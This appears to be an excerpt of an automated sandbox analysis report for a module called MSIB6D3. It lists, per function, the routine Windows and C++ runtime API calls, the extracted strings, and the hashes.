                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3931714976-0
                                                                                    • Opcode ID: 76e68346bbcdfa9b89fd2a2a1e1667d3f18a263e98781bf91539480350288e8a
                                                                                    • Instruction ID: 0591451b18ae426aeb1c2d1c8d2b8093c95302bc41a3769934ac1d72b40ae709
                                                                                    • Opcode Fuzzy Hash: 76e68346bbcdfa9b89fd2a2a1e1667d3f18a263e98781bf91539480350288e8a
                                                                                    • Instruction Fuzzy Hash: 5B51BFB1900208DFDB11DF58C891BAEFBF4FF10314F258199E915AB392DBB59A05CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B731
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B74F
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B777
                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,00000000,5D8D6CBB,?,00000000,00000000), ref: 00B3B7CF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3B863
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B88D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3931714976-0
                                                                                    • Opcode ID: d756e4a0052a3d84af638bffc75397208c5edd15c90f10741fca1ae52f77ff3c
                                                                                    • Instruction ID: b9a4a400d1cf45d476a305c71c7ed7f45f5226df8a7db3f6514a4036761ce52c
                                                                                    • Opcode Fuzzy Hash: d756e4a0052a3d84af638bffc75397208c5edd15c90f10741fca1ae52f77ff3c
                                                                                    • Instruction Fuzzy Hash: 1F518B75904214DFCB21DF98C884B9EBBF4EF54310F24869DE955AB391DBB0AE01CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                    • String ID: a/p$am/pm
                                                                                    • API String ID: 3509577899-3206640213
                                                                                    • Opcode ID: 70db42d4932bd54497631041e392a67247833b8f3764b319e5a4055f45888084
                                                                                    • Instruction ID: f670c6a79783db5f2aa3f3c18299b6646e168c7cb0f673ca990acc552a67d867
                                                                                    • Opcode Fuzzy Hash: 70db42d4932bd54497631041e392a67247833b8f3764b319e5a4055f45888084
                                                                                    • Instruction Fuzzy Hash: 06C1CD35920206DBDB24AF6AC989ABBB7F0FF55700F2440D9E906AB350D739AD41CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00B5596F,00B54900,00B5358F), ref: 00B55986
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B55994
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B559AD
                                                                                    • SetLastError.KERNEL32(00000000,00B5596F,00B54900,00B5358F), ref: 00B559FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 830055a39952e0d19b8efbe573d9afab1042a547c2e26b04ce59184eacd75f3c
                                                                                    • Instruction ID: aa29184742957336dc195ff9fa06b2b2d2abf778770d0e21cf703dc4ec1d2ab9
                                                                                    • Opcode Fuzzy Hash: 830055a39952e0d19b8efbe573d9afab1042a547c2e26b04ce59184eacd75f3c
                                                                                    • Instruction Fuzzy Hash: E901D873209B11EFA63526B47C96B5A2BD4DF017B773003E9FD14971F0EE654C499290
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetTempFileNameW.KERNEL32(?,URL,00000000,?,5D8D6CBB,?,00000004), ref: 00B33294
                                                                                    • MoveFileW.KERNEL32(?,00000000), ref: 00B3354A
                                                                                    • DeleteFileW.KERNEL32(?), ref: 00B33592
                                                                                      • Part of subcall function 00B31A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00B31AF7
                                                                                      • Part of subcall function 00B31A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00B31B7D
                                                                                      • Part of subcall function 00B32E60: LocalFree.KERNEL32(?,5D8D6CBB,?,?,00B73C40,000000FF,?,00B31242,5D8D6CBB,?,?,00B73C75,000000FF), ref: 00B32EB1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                    • String ID: URL$url
                                                                                    • API String ID: 853893950-346267919
                                                                                    • Opcode ID: 8aede620ebe9d938e9ec1714224933959936eb9b9a9250e28bc387b3355a8d19
                                                                                    • Instruction ID: 1c05394ab3246700e5954d99199111f3694560e17a777c19d03a5c41f4649295
                                                                                    • Opcode Fuzzy Hash: 8aede620ebe9d938e9ec1714224933959936eb9b9a9250e28bc387b3355a8d19
                                                                                    • Instruction Fuzzy Hash: 73C16870D142689ADB24DF28CC997DEBBF4BF14704F2042D9D409A7291EBB56B88CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B33735
                                                                                    • GetLastError.KERNEL32(?,?,?,00B74215,000000FF), ref: 00B3381A
                                                                                      • Part of subcall function 00B32310: GetProcessHeap.KERNEL32 ref: 00B32365
                                                                                      • Part of subcall function 00B346F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00B33778,-00000010,?,?,?,00B74215,000000FF), ref: 00B34736
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00B337C6
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00B74215,000000FF), ref: 00B337DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                    • String ID: ntdll.dll
                                                                                    • API String ID: 3941625479-2227199552
                                                                                    • Opcode ID: 8aba1c85e4621d0035b50ba5dd81b13b0134ea8993ccc10aa0507dbb5a9001a7
                                                                                    • Instruction ID: 88b1e2fe0136bb39624169144674d0b78c682364f857938125a7e7c98031c076
                                                                                    • Opcode Fuzzy Hash: 8aba1c85e4621d0035b50ba5dd81b13b0134ea8993ccc10aa0507dbb5a9001a7
                                                                                    • Instruction Fuzzy Hash: A2418271A00605EFDB10DFA8CC55BAEB7E4FF14710F2445A9E916D7291EBB0AA04CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B31A20: LocalFree.KERNEL32(?), ref: 00B31A42
                                                                                      • Part of subcall function 00B53E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B31434,?,?,00B3D341,00B31434,00B88B5C,?,00B31434,?,00000000), ref: 00B53EBA
                                                                                    • GetCurrentProcess.KERNEL32(5D8D6CBB,5D8D6CBB,?,?,00000000,00B74981,000000FF), ref: 00B362EB
                                                                                      • Part of subcall function 00B52C98: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CA3
                                                                                      • Part of subcall function 00B52C98: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CE0
                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B362B0
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B362B7
                                                                                      • Part of subcall function 00B52C4E: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C58
                                                                                      • Part of subcall function 00B52C4E: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C8B
                                                                                      • Part of subcall function 00B52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B52D02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                    • String ID: IsWow64Process$kernel32
                                                                                    • API String ID: 1333104975-3789238822
                                                                                    • Opcode ID: 8669e5330b8024e1d4a9ea5ae2c35c4bde5f107ede7fdff9c8f08b1ad487c201
                                                                                    • Instruction ID: 1f45c2efa6d108ac94ea9a5f3b8b1cf702737c8117761e379b84526491e44ed6
                                                                                    • Opcode Fuzzy Hash: 8669e5330b8024e1d4a9ea5ae2c35c4bde5f107ede7fdff9c8f08b1ad487c201
                                                                                    • Instruction Fuzzy Hash: 63219371D44605EFCB10EF94DD06B5D77E8FB14B11F2006A5E925A36E0EF74A904CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Mpunct$GetvalsH_prolog3
                                                                                    • String ID: $+xv
                                                                                    • API String ID: 2204710431-1686923651
                                                                                    • Opcode ID: 777c18bed9067cc77d7291d338608d4ab7ed3e295e970062471a901afcd47a6b
                                                                                    • Instruction ID: 4fde253ffc786f1292589cdfb5cd44609c753df41afe0b234f19ad250259dc4f
                                                                                    • Opcode Fuzzy Hash: 777c18bed9067cc77d7291d338608d4ab7ed3e295e970062471a901afcd47a6b
                                                                                    • Instruction Fuzzy Hash: 842190B1904B926EDB25DF74C49177FBEE8AB08301F04499AE459C7A42D774E701DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(5D8D6CBB,5D8D6CBB,?,?,00000000,00B74981,000000FF), ref: 00B362EB
                                                                                      • Part of subcall function 00B52C98: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CA3
                                                                                      • Part of subcall function 00B52C98: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CE0
                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B362B0
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B362B7
                                                                                      • Part of subcall function 00B52C4E: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C58
                                                                                      • Part of subcall function 00B52C4E: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C8B
                                                                                      • Part of subcall function 00B52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B52D02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                    • String ID: IsWow64Process$kernel32
                                                                                    • API String ID: 2056477612-3789238822
                                                                                    • Opcode ID: 15af5001970b45ef9b9dff053e857b4814bb94c7db7dd14f316a89effa55e938
                                                                                    • Instruction ID: 9f3d881af37e9162b2267d138755b540216704a969b9103a26e136cb22037657
                                                                                    • Opcode Fuzzy Hash: 15af5001970b45ef9b9dff053e857b4814bb94c7db7dd14f316a89effa55e938
                                                                                    • Instruction Fuzzy Hash: 5E11B4B2D44714EFCB10DF94DD05B99B7E8FB15710F1042AAE825936E0EB75A904CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00B56AA3,?,?,00B8DDCC,00000000,?,00B56BCE,00000004,InitializeCriticalSectionEx,00B797E8,InitializeCriticalSectionEx,00000000), ref: 00B56A72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: 6799918958bd1a798a3b73e7ed1e51c65de3be4172102808a917353976b43e85
                                                                                    • Instruction ID: 3abad80ce199f03ef52c9f6309e636cd8c605435e41a6f3cf1f43883ada30755
                                                                                    • Opcode Fuzzy Hash: 6799918958bd1a798a3b73e7ed1e51c65de3be4172102808a917353976b43e85
                                                                                    • Instruction Fuzzy Hash: C611A331E44225ABDF228B689C41B5933E4DF11772F5442E0FD19FB280DB70ED048AD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5D8D6CBB,?,?,00000000,00B76A6C,000000FF,?,00B62DC1,?,?,00B62D95,?), ref: 00B62E23
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B62E35
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00B76A6C,000000FF,?,00B62DC1,?,?,00B62D95,?), ref: 00B62E57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: fbf2b844f71aa8aa3bcaab218d1f7b028a17ac3c61906916b813f4c6104a3c4d
                                                                                    • Instruction ID: 9dc155fcab0b2c405415776146d1f11f9b9c757afabfe69fdc25d07bef1b57c9
                                                                                    • Opcode Fuzzy Hash: fbf2b844f71aa8aa3bcaab218d1f7b028a17ac3c61906916b813f4c6104a3c4d
                                                                                    • Instruction Fuzzy Hash: 70018B72948A19ABDB128F40CC05FAEBBF8FB04B10F004565F826B26A0DF799900CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B66E40
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B66F01
                                                                                    • __freea.LIBCMT ref: 00B66F68
                                                                                      • Part of subcall function 00B65BDC: HeapAlloc.KERNEL32(00000000,00000000,00B63841,?,00B6543A,?,00000000,?,00B56CE7,00000000,00B63841,00000000,?,?,?,00B6363B), ref: 00B65C0E
                                                                                    • __freea.LIBCMT ref: 00B66F7D
                                                                                    • __freea.LIBCMT ref: 00B66F8D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: d7cc4cf2b425bccefbc1e58638f122897abc652d96ca03e05ea711ddaf2ab56a
                                                                                    • Instruction ID: a4fba4521509552f2b025514fde5b34c3a96814c3cf9e8c9684ac705c4f287dc
                                                                                    • Opcode Fuzzy Hash: d7cc4cf2b425bccefbc1e58638f122897abc652d96ca03e05ea711ddaf2ab56a
                                                                                    • Instruction Fuzzy Hash: AF515F72600206AFEB259FA5DC81EBF7BE9EF44754B1501A9FD08D6251EB3ADC108660
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B8DD
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B900
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B928
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3B98D
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B9B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                    • String ID:
                                                                                    • API String ID: 459529453-0
                                                                                    • Opcode ID: 6e9b51896b4f4595650e0a4809510491781067e402dd1924c1707b5580d8967e
                                                                                    • Instruction ID: 81927d0bd8848ba5acc3ee3dd287cc685ee3ccac36d367a807658b522e6ee773
                                                                                    • Opcode Fuzzy Hash: 6e9b51896b4f4595650e0a4809510491781067e402dd1924c1707b5580d8967e
                                                                                    • Instruction Fuzzy Hash: FE31C335900218DFCB11DF54D981BAEBBF4EF24324F2442D9EA546B3A1DB31AE05CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,?,76C14450,00B35646,?,?,?,?,?), ref: 00B35898
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                    • API String ID: 1452528299-1782174991
                                                                                    • Opcode ID: 74aca5dc2768dceb1ad02e3613fd971d73280eceeb01db7713de05d71a13cc52
                                                                                    • Instruction ID: e1b9148bba4ea7f17097eefb5613d84e30567e9f165b6069174883c3a4a56d6d
                                                                                    • Opcode Fuzzy Hash: 74aca5dc2768dceb1ad02e3613fd971d73280eceeb01db7713de05d71a13cc52
                                                                                    • Instruction Fuzzy Hash: 07115E56A10625D7CB302F6DD800366B2E4DF50764F6505BFD889D73A1EAA98C818394
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Maklocstr$Maklocchr
                                                                                    • String ID:
                                                                                    • API String ID: 2020259771-0
                                                                                    • Opcode ID: 06c5c523e168da86b7d095db3947a653fb9cad98e71d6787ccbe8dc9164ba5e8
                                                                                    • Instruction ID: e269cad2e47c04a51c9d91b3b0f9c88983c70fe39ecef819111396cb0fe4f6fb
                                                                                    • Opcode Fuzzy Hash: 06c5c523e168da86b7d095db3947a653fb9cad98e71d6787ccbe8dc9164ba5e8
                                                                                    • Instruction Fuzzy Hash: AC1191B1980784BFE720DBA8CC81F12B7ECEF04350F080959F695CBA41D264FE9097A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B3D883
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3D88D
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • numpunct.LIBCPMT ref: 00B3D8C7
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3D8DE
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D8FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
